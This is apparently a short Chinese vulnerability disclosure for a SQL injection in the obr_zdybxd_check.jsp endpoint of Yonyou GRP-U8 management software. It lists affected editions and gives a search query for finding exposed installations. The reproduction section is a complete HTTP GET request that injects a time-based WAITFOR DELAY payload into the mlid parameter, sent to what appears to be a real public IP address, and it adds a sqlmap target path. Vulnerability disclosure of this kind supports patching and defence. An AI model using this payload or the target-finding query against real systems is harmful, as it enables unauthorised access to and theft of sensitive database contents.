用友GRP-U8 obr_zdybxd_check sql注入
一、漏洞简介
用友GRP-U8是用友软件推出的一款企业级管理软件套件,旨在帮助企业实现全面的数字化管理和业务优化。用友GRP-U8 obr_zdybxd_check接口对用户传入的参数未进行有效的过滤,直接拼接到SQL查询语句中,导致SQL注入漏洞。攻击者通过该漏洞可以获取数据库敏感信息。
二、影响版本
- 用友GRP-U8 行政事业内控管理软件(新政府会计制度专版)
- 用友GRP-U8 高校内控管理软件(Manager版)
三、资产测绘
- hunter
app.name="用友GRP-U8 OA" - 特征
四、漏洞复现
GET /u8qx/obr_zdybxd_check.jsp?mlid=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host: 1.14.47.145:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
sqlmap
/u8qx/obr_zdybxd_check.jsp?mlid=1